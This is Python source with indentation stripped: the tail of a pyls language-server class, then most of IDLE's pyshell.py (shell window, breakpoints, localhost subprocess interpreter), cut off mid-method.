def m_text_document__range_formatting(self, textDocument=None, range=None, _options=None, **_kwargs):
# Again, we'll ignore formatting options for now.
return self.format_range(textDocument['uri'], range)
def m_text_document__references(self, textDocument=None, position=None, context=None, **_kwargs):
exclude_declaration = not context['includeDeclaration']
return self.references(textDocument['uri'], position, exclude_declaration)
def m_text_document__signature_help(self, textDocument=None, position=None, **_kwargs):
return self.signature_help(textDocument['uri'], position)
def m_workspace__did_change_configuration(self, settings=None):
self.config.update((settings or {}).get('pyls', {}))
for doc_uri in self.workspace.documents:
self.lint(doc_uri, is_saved=False)
def m_workspace__did_change_watched_files(self, **_kwargs):
# Externally changed files may result in changed diagnostics
for doc_uri in self.workspace.documents:
self.lint(doc_uri, is_saved=False)
def m_workspace__execute_command(self, command=None, arguments=None):
return self.execute_command(command, arguments)
def flatten(list_of_lists):
return [item for lst in list_of_lists for item in lst]
def merge(list_of_dicts):
return {k: v for dictionary in list_of_dicts for k, v in dictionary.items()}
|
pyshell.py | #! /usr/bin/env python3
import sys
if __name__ == "__main__":
sys.modules['idlelib.pyshell'] = sys.modules['__main__']
try:
from tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
raise SystemExit(1)
# Valid arguments for the ...Awareness call below are defined in the following.
# https://msdn.microsoft.com/en-us/library/windows/desktop/dn280512(v=vs.85).aspx
if sys.platform == 'win32':
try:
import ctypes
PROCESS_SYSTEM_DPI_AWARE = 1 # Int required.
ctypes.OleDLL('shcore').SetProcessDpiAwareness(PROCESS_SYSTEM_DPI_AWARE)
except (ImportError, AttributeError, OSError):
pass
import tkinter.messagebox as tkMessageBox
if TkVersion < 8.5:
root = Tk() # otherwise create root in main
root.withdraw()
from idlelib.run import fix_scaling
fix_scaling(root)
tkMessageBox.showerror("Idle Cannot Start",
"Idle requires tcl/tk 8.5+, not %s." % TkVersion,
parent=root)
raise SystemExit(1)
from code import InteractiveInterpreter
import linecache
import os
import os.path
from platform import python_version
import re
import socket
import subprocess
from textwrap import TextWrapper
import threading
import time
import tokenize
import warnings
from idlelib.colorizer import ColorDelegator
from idlelib.config import idleConf
from idlelib import debugger
from idlelib import debugger_r
from idlelib.editor import EditorWindow, fixwordbreaks
from idlelib.filelist import FileList
from idlelib.outwin import OutputWindow
from idlelib import rpc
from idlelib.run import idle_formatwarning, StdInputFile, StdOutputFile
from idlelib.undo import UndoDelegator
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
which can be None, the capture of the consequence AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, OSError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
#TODO: don't read/write this from/to .idlerc when testing
self.breakpointPath = os.path.join(
idleConf.userdir, 'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
except OSError:
lines = []
try:
with open(self.breakpointPath, "w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except OSError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.CurrentTheme()
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
def restart_line(width, filename): # See bpo-38141.
"""Return width long restart line formatted with filename.
Fill line with balanced '='s, with any extras and at least one at
the beginning. Do not end with a trailing space.
"""
tag = f"= RESTART: {filename or 'Shell'} ="
if width >= len(tag):
div, mod = divmod((width -len(tag)), 2)
return f"{(div+mod)*'='}{tag}{div*'='}"
else:
return tag[:-2] # Remove ' ='.
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
self.original_compiler_flags = self.compile.compiler.flags
_afterid = None
rpcclt = None
rpcsubproc = None
def spawn_subprocess(self):
if self.subprocess_arglist is None:
self.subprocess_arglist = self.build_subprocess_arglist()
self.rpcsubproc = subprocess.Popen(self.subprocess_arglist)
def build_subprocess_arglist(self):
assert (self.port!=0), (
"Socket should have been assigned a port number.")
w = ['-W' + s for s in sys.warnoptions]
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except OSError:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
debugger_r.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
console.write('\n')
console.write(restart_line(console.width, filename))
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
if not filename:
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
debugger_r.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.listening_sock.close()
except AttributeError: # no socket
pass
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated"
try:
self.rpcsubproc.kill()
except OSError:
# process already terminated
return
else:
try:
self.rpcsubproc.wait()
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, OSError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "pyshell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import debugobj_r
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = debugobj_r.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.tree import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.CurrentTheme()
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
with tokenize.open(filename) as fp:
source = fp.read()
if use_subprocess:
source = (f"__file__ = r'''{os.path.abspath(filename)}'''\n"
+ source + "\ndel __file__")
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
# at the moment, InteractiveInterpreter expects str
assert isinstance(source, str)
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Override Interactive Interpreter method: Use Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
tkconsole = self.tkconsole
text = tkconsole.text
text.tag_remove("ERROR", "1.0", "end")
type, value, tb = sys.exc_info()
msg = getattr(value, 'msg', '') or value or "<no detail available>"
lineno = getattr(value, 'lineno', '') or 1
offset = getattr(value, 'offset', '') or 0
if offset == 0:
lineno += 1 #mark end of offending line
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
tkconsole.colorize_syntax_error(text, pos)
tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % msg)
tkconsole.showprompt()
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in list(c.keys()):
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec(code, self.locals)
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.restart_subprocess()
self.checklinecache()
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec(code, self.locals)
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
parent=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
return self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
parent=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Connection Error",
"IDLE's subprocess didn't make connection.\n"
"See the 'Startup failure' section of the IDLE doc, online at\n"
"https://docs.python.org/3/library/idle.html#startup-failure",
parent=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
parent=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "IDLE Shell " + python_version()
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("window", "_Window"),
("help", "_Help"),
]
# Extend right-click context menu
rmenu_specs = OutputWindow.rmenu_specs + [
("Squeeze", "<<squeeze-current-text>>"),
]
allow_line_numbers = False
# New classes
from idlelib.history import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
OutputWindow.__init__(self, flist, None, None)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.sys_ps1 = sys.ps1 if hasattr(sys, 'ps1') else '>>> '
self.prompt_last_line = self.sys_ps1.split('\n')[-1]
self.prompt = self.sys_ps1 # Changes when debug active
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
squeezer = self.Squeezer(self)
text.bind("<<squeeze-current-text>>",
squeezer.squeeze_current_text_event)
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import iomenu
self.stdin = StdInputFile(self, "stdin",
iomenu.encoding, iomenu.errors)
self.stdout = StdOutputFile(self, "stdout",
iomenu.encoding, iomenu.errors)
self.stderr = StdOutputFile(self, "stderr",
iomenu.encoding, "backslashreplace")
self.console = StdOutputFile(self, "console",
iomenu.encoding, iomenu.errors)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
try:
# page help() text to shell.
import pydoc # import must be done here to capture i/o rebinding.
# XXX KBK 27Dec07 use text viewer someday, but must work w/o subproc
pydoc.pager = pydoc.plainpager
except:
sys.stderr = sys.__stderr__
raise
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
parent=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
debugger_r.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
self.prompt = self.sys_ps1
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = debugger_r.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
self.prompt = "[DEBUG ON]\n" + self.sys_ps1
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = True
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = False
self.canceled = False
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"Your program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "help", "copyright", "credits" or "license()" for more information.'
def begin(self):
self.text.mark_set("iomark", "insert")
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = ("==== No Subprocess ====\n\n" +
"WARNING: Running IDLE without a Subprocess is deprecated\n" +
"and will be removed in a later version. See Help/IDLE Help\n" +
"for details.\n\n")
sys.displayhook = rpc.displayhook
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.text.focus_force()
self.showprompt()
import tkinter
tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = True
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
self.resetoutput()
if self.canceled:
self.canceled = False
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = False
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = False
self.canceled = True
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = False
self.endoffile = True
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
